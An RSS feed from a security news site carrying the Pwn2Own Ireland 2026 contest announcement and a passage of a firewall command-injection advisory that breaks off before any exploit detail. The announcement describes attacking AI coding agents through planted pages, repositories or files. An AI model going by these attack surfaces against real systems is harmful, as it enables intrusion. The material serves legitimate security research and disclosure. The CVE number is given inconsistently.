<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=selfhosted+thermal+printer+appliance%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Sat, 01 Aug 2026 08:01:19 +0200</lastBuildDate>
<pubDate>Sat, 01 Aug 2026 08:01:19 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=selfhosted+thermal+printer+appliance%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=selfhosted+thermal+printer+appliance%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Pwn2Own Ireland 2026 – New Targets and Categories]]></title>
<description><![CDATA[If you just want to read the rules, you can find them here.  Pwn2Own Ireland returns for 2026, and it’s the third year for this event in the Emerald Isle. Despite the dreary Irish skies (and the threat of a random banshee), we had an amazing event, even if we did end up in a jail at the end. With...]]></description>
<link>https://tsecurity.de/de/3694559/hacking/pwn2own-ireland-2026-new-targets-and-categories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694559/hacking/pwn2own-ireland-2026-new-targets-and-categories/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:51 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>If you just want to read the rules, you can find them </em><a href="https://www.zerodayinitiative.com/Pwn2OwnIreland2026Rules.html" target="_blank"><em>here</em></a><em>. </em></p><p class=""> </p><p class="">Pwn2Own Ireland returns for 2026, and it’s the third year for this event in the Emerald Isle. Despite the dreary Irish skies (and the threat of a random <a href="https://youtube.com/shorts/PjpvUdhn6e0?feature=share">banshee</a>), we had an amazing event, even if we did end up in a <a href="https://youtu.be/ruxOpC-b-yM?si=Epu-ewvSe5VNQNbP&amp;t=333">jail</a> at the end. With that in mind, we’re excited to return to Cork this fall for yet another great Pwn2Own event. We’ll also be returning to some of the great pubs Ireland has to offer in the evenings and wrapping the event up at a special location (stay tuned for that announcement).</p><p class="">As for the contest itself, it will run from October 6-9, 2026. As always, we’ll have a random drawing to determine the schedule of attempts on the first day of the contest, and we will proceed from there. Registration closes at 5:00 p.m. Irish Standard Time on Oct 1st, 2026. There are no exceptions for late entries, so if you have questions, please contact us at <a href="mailto:pwn2own@trendmicro.com">pwn2own@trendmicro.com</a> (note the address). We will be happy to address your issues or concerns directly.</p><p class="">Due to the overwhelming amount of registrations and last-minute entries for our Pwn2Own Berlin event, we’re changing who can enter the contest a bit to ensure it’s fair for all researchers. To enter, you must have received an aggregate bounty payment totaling at least $15,000 during their life-time participation in ZDI. This includes past Pwn2Own events and our regular bug bounty program. We recognize there may be some who haven’t participated in the past with great exploits to demonstrate, so we will also accept up to 10 new contestants at our discretion. We’re capping the number of entries to 80 this year. Once we have 80 qualifying entries, we will close registration. That means if you want to enter, it is in your best interest to contact us sooner rather than later. Please read the rules <em>thoroughly</em> to ensure you meet all the requirements.</p><p class="">Now on to this year’s target categories. We’ll have seven different categories for this year’s event:</p>





















  
  



<p><a data-preserve-html-node="true" name="top"></a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#phones">-- Mobile Phones</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#smarthome">--	Smart Home Devices</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#wellness">-- Wellness</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#printers">-- Printers</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#messaging">--	Messaging</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#infrastructure">-- AI Infrastructure</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#agents">-- AI Coding Agents</a>  </p>




  <p class="">Let’s take a look at each category in more detail, starting with mobile phones.</p>





















  
  



<p><a data-preserve-html-node="true" name="phones"></a> </p>




  <p class=""><strong>The Target Phones</strong></p><p class="">Back in Amsterdam where this contest originated, it was originally dubbed “Mobile Pwn2Own” and our focus was strictly on phones. Mobile handsets remain at the heart of this event, and some of the Samsung entries from last year were absolutely smashing. As always, these phones will be running the latest version of their respective operating systems with all available updates installed. Last year we also introduced the USB attack vector, but no one submitted an entry for it. We’ll see if that changes this year.</p><p class="">Otherwise, contestants must compromise the device by browsing to content in the default browser for the target under test or by communicating with the following short-distance protocols: near field communication (NFC), Wi-Fi, or Bluetooth. The awards for this category are:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="smarthome"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Smart Home Devices</b></p>




  <p class="">As you might have noticed, we have eliminated most of the consumer-related devices from this year’s event. However, there are still a few “pro-sumer” devices that still could have an impact on enterprises, and the first of these categories are the devices that control other devices and services. An attempt in this category must be launched against the target’s exposed network services, RF attack surface, or exposed features from the contestant’s laptop within the contest network.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="wellness"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Wellness Category</b></p>




  <p class="">This is one of the new categories this year and our first foray into the world of healthcare devices. However, we don’t intend to make this too easy. Entries that require physically pressing any button on the target, or the use of any information, code or PIN printed on the device, are out of scope. Entries that require the contestant to be paired to the target prior to the start of the attempt are not in scope. An attempt in this category must be launched against the target’s exposed network services, RF attack surface, or exposed features from the contestant’s laptop within the contest network.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="printers"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Rage Against the Printers </b></p>




  <p class="">Printers have long been the source of jokes and memes, but they are also an often overlooked attack surface in your office. The printer category always produces some interesting results, often by playing music it shouldn’t or the occasional Rick Roll. We’ve reduced the number of targets in this category this year, but we still expect to see some interesting exploits in these oft unheralded targets. </p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="messaging"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Messaging Category</b></p>




  <p class="">We introduced WhatsApp as a target last year and came close to seeing a functioning exploit. Sadly, that didn’t happen. However, WhatsApp is used by more than three billion people globally, and some of the messages transmitted can be quite sensitive. That’s why we are bringing it back and hoping for some better results. We know the bugs are out there. We’re just hoping the right researcher decides to show us an exploit that leads to code execution. All of the target handset will be available as clients. Here’s the full prize list for Messaging category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="infrastructure"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">AI Infrastructure Category</b></p>




  <p class="">We introduced these targets at Pwn2Own Berlin, and we saw such…uh…enthusiasm from the community that we decided to immediately bring them back for our Ireland event. An attempt in this category must be launched from the contestant’s laptop. Here’s a look at the targets and awards in the AI Infrastructure category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="agents"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">AI Coding Agent Category</b></p>




  <p class="">Let’s face it. At some point or another, we’ve probably all vibe coded something. There’s no shame in that, but how secure are the tools we use for vibe coding? Well, let’s take the most popular choices and find out. A successful entry must interact with a contestant-controlled resource (e.g. web page, repository, media file) to exploit a vulnerability within the coding agent. The attack vector of the entry must be a common coding agent use case. There are few things out of scope here as well. UI spoofing or misrepresentation unrelated to permission prompts, model jailbreaks or prompt outputs that do not cross security boundaries, and vulnerabilities that require unsafe or permission-less modes are just a few of the things not allowed. As this is a recently updated category, please read the rules carefully to ensure your entry qualifies. Here’s a look at the targets and awards in the AI Coding Agent category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class=""><strong>Master of Pwn</strong></p><p class="">No Pwn2Own contest would be complete without crowning a Master of Pwn, which signifies the overall winner of the competition. Earning the title results in a slick <a href="https://pbs.twimg.com/media/Eyexso3WUAYbXPK?format=jpg&amp;name=4096x4096">trophy</a>, a different sort of <a href="https://twitter.com/thezdi/status/1240400682034909187">wearable</a>, and brings with it an additional 65,000 ZDI reward points (instant <a href="https://www.zerodayinitiative.com/about/benefits/">Platinum</a> status in 2027).</p><p class="">For those not familiar with how it works, points are accumulated for each successful attempt. While only the first demonstration in a category wins the full cash award, each successful entry claims the full number of Master of Pwn points. Since the order of attempts is determined by a random draw, those who receive later slots can still claim the Master of Pwn title – even if they earn a lower cash payout. As with previous contests, there are penalties for withdrawing from an attempt once you register for it. If the contestant decides to remove an Add-on Bonus during their attempt, the Master of Pwn points for that Add-on Bonus will be deducted from the final point total for that attempt. For example, someone registers for the Apple iPhone 15 with the Kernel Bonus Add-on. During the attempt, the contestant drops the Kernel Bonus Add-on but completes the attempt. The final point total will be 20 Master of Pwn points.</p><p class=""><strong>The Complete Details</strong></p><p class="">The full set of rules for Pwn2Own Ireland 2026 can be found <a href="https://www.zerodayinitiative.com/Pwn2OwnIreland2026Rules.html" target="_blank">here</a>. They may be changed at any time without notice. We <strong>highly encourage</strong> potential entrants to read the rules <em>thoroughly</em> and <em>completely</em> should they choose to participate. We also encourage contestants to read <a href="https://www.zerodayinitiative.com/blog/2022/5/3/what-to-expect-when-exploiting-a-guide-to-pwn2own-participation" target="_blank">this blog</a> covering what to expect when participating in Pwn2Own.</p><p class="">Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at <a href="mailto:pwn2own@trendmicro.com?subject=Pwn2Own%20Tokyo%202023%20Registration">pwn2own@trendmicro.com</a> to begin the registration process. (Email only, please; queries via social media, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine the contest order. Registration closes at 5:00 p.m. Irish Standard Time on Oct 1st, 2025.</p><p class=""><strong>The Results</strong></p><p class="">We’ll be <a href="https://www.zerodayinitiative.com/blog" target="_blank">blogging</a> and tweeting results in real-time throughout the competition. Be sure to keep an eye on the blog for the latest information. Follow us on Twitter at <a href="https://twitter.com/thezdi" target="_blank">@thezdi</a> and <a href="https://twitter.com/trendaisecurity" target="_blank">@trendaisecurity</a>, and keep an eye on the <a href="https://twitter.com/search?q=%23p2oireland">#P2OIreland</a> hashtag for continuing coverage. </p><p class="">We look forward to seeing everyone in Cork, and we look forward to seeing what new exploits and attack techniques they bring with them.</p><p class=""> </p><p class="">©2026 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, TrendAI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-6978: Arbitrary Code Execution in the Arista NG Firewall]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by Gereon Huppertz and reported through the Tre...]]></description>
<link>https://tsecurity.de/de/3694475/it-security-nachrichten/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694475/it-security-nachrichten/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by</em> <em>Gereon Huppertz and reported through the TrendAI Zero Day Initiative (ZDI) program. Successful exploitation could result in arbitrary command execution under the security context of the root user. The following is a portion of their write-up covering CVE-2025-6798, with a few minimal modifications.</em></p>





















  
  




  



  <hr>
  
    
    



  




  <p class="">A command injection vulnerability has been reported in Arista NG Firewall. The vulnerability is due to improper validation of user data in the diagnostics component.</p><p class="">A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the root user. </p><p class=""><strong>The Vulnerability</strong></p><p class="">Arista NG Firewall is an open-source firewall appliance. It was originally developed under the name Untangle. Some features of Arista Firewall include spam blocking, bandwidth control, and IPS, etc. NG Firewall can be managed through a web user interface, or a JSON-RPC API using HTTP.</p><p class="">HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents a space character. Parameters can be passed from the client to the server as name-value pairs in either the Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a simple HTTP request passing a parameter named “param” with value “1”, using the GET method might look like:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">A corresponding HTTP request using the POST method might look like:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If there is more than one parameter/value pair, they are encoded as '&amp;'-delimited name=value pairs:</p>
<p>          <code>var1=value1&amp;var2=value2&amp;var3=value3...</code></p>
<p>The component relevant to this report is the JSON-RPC endpoint. A JSON object has the following syntax:</p>




